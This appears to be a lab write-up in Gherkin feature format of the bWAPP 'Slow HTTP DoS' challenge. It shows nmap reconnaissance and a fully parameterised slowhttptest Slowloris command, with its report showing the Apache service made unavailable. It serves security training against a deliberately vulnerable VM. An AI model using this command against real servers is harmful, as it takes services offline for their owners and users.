# language: en

Feature: Denial Of Service (Slow Http DoS)
  From system bWAPP
  From the A5 - Security Misconfiguration
  With Low security level

Background:
  Given I am running Debian Stretch GNU/Linux kernel 4.9.0-6-amd64
  And I am using Firefox 52.7.3 (64-bit)
  And I am running Burp Suite Community edition v1.7.30
  And I am running nmap 7.40v
  And I am running slowhttptest 1.6v
  Given the following in the url
  """
  URL: http://localhost/bWAPP/sm_dos_1.php
  Message: Denial of Service - (Slow Http DoS)
  Details:
      - The Apache web server is vulnerable to Slow HTTP DoS attacks!
  Objective: Launch a DoS attack on the apache service
  """

Scenario: Denial Of Service (Slow Http DoS)
This kind of DoS rely on the fact the HTTP protocol, by design
requires requests to be completely received by the server before they
are processed. If a request is not complete or the rate-transfer is to
slow, the server keeps it resource busy waiting for the end of the data.
This is mostly an slow exhaustion of resources.
  Given the kind of attack
  Then I proceed to gather some information first
  """
  # Nmap on target server
  skhorn@Morgul ~/D/p/challs> nmap -sV 192.168.56.101

  Starting Nmap 7.40 ( https://nmap.org ) at 2018-07-23 20:49 -05
  Nmap scan report for 192.168.56.101
  Host is up (0.0012s latency).
  Not shown: 983 closed ports
  PORT     STATE SERVICE     VERSION
  21/tcp   open  ftp         ProFTPD 1.3.1
  22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
  25/tcp   open  smtp        Postfix smtpd
  80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2
  mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8
  OpenSSL/0.9.8g)
  """
  And I see, port 80 is used by apache
  Then I slowhttptest package to perform the attack
  And it goes like this
  """
  # slowhttptest command + params explained
  slowhttptest -c 1000 -H -g -o header -i 10 -r 200 -t GET \
  -u http://192.168.56.101/bWAPP/login.php -x 24 -p 3

  -c connections   target number of connections
  -H               slow headers a.k.a. Slowloris
  -g               generate statistics with socket state changes
  -i seconds       interval between followup data in seconds
  -r rate          connections per seconds
  -t verb          verb to use in request, default to GET for
  slow headers and response and to POST for slow body
  -u URL           absolute URL of target (http://localhost/)
  -x bytes         max length of each randomized name/value pair of
  followup data per tick
  -p seconds       timeout to wait for HTTP response on probe connection,
  after which server is considered inaccessible

  # Basically each 10 seconds, 200 connections will be initiated
  # with the Slowloris method
  """
  Then after I execute it, I see the generated report
  """
  test type:                        SLOW HEADERS
  number of connections:            1000
  URL:                              http://192.168.56.101/bWAPP/login.php
  verb:                             GET
  Content-Length header value:      4096
  follow up data max size:          52
  interval between follow up data:  10 seconds
  connections per seconds:          200
  probe connection timeout:         3 seconds
  test duration:                    240 seconds
  using proxy:                      no proxy

  # This starts like this:
  service available:   YES
  # And must finish like this
  service available:   NO
  """
  Then I try to use the website
  And this is what I get
  """
  # Server not responding...
  Not Found

  The requested URL /login.php was not found on this server.
  Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5
  with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g Server at 192.168.56.101
  Port 80

  # It crashed!
  """
